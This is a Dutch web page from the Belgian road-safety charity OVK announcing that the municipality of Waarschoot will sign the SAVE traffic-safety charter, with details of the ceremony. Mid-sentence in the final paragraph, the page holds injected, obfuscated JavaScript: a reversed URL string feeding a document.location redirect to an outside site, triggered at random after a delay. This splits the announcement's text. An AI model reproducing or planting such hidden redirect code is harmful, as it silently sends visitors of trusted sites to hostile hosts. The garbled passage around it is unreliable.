Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Waarschoot ondertekent SAVE-charter

 

Op zaterdag 7 september zal het gemeentebestuur van Waarschoot het SAVE-charter Steden & Gemeenten officieel ondertekenen. Hiermee worden ze de tweeëntwintigste gemeente die het engagement aangaat om een actieplan verkeersveiligheid op te stellen, in samenwerking met OVK.

De ondertekening vindt plaats op  zaterdag 7 september om 11u. op het Dorpsplein van Waarschoot, waar een podium opgesteld zal staan. Diezelfde dag wordt ook de jaarlijkse kermis van Waarschoot geopend. Zopas werden tussen de gemeente en OVK de praktische afspraken omtrent het verloop van de ondertekening gemaakt: er zullen korte tussenkomsten zijn van het bestuurscollege, de lokale politie en OVK, waarna de eigenlijke ondertekening volgt. Nadien volgt nog een kleine receptie.

Jullie zijn uiteraard hartelijk uitgenodigd deze ondertekening bij te wonen, die voor Waarschoot het startpunt van het belangrijkere werk betekent, te beginnen met de opstelling van een actieplan waarvan de uitvoering op termijn moet uitmonden in de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekenning van het SAVE-label.

 


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be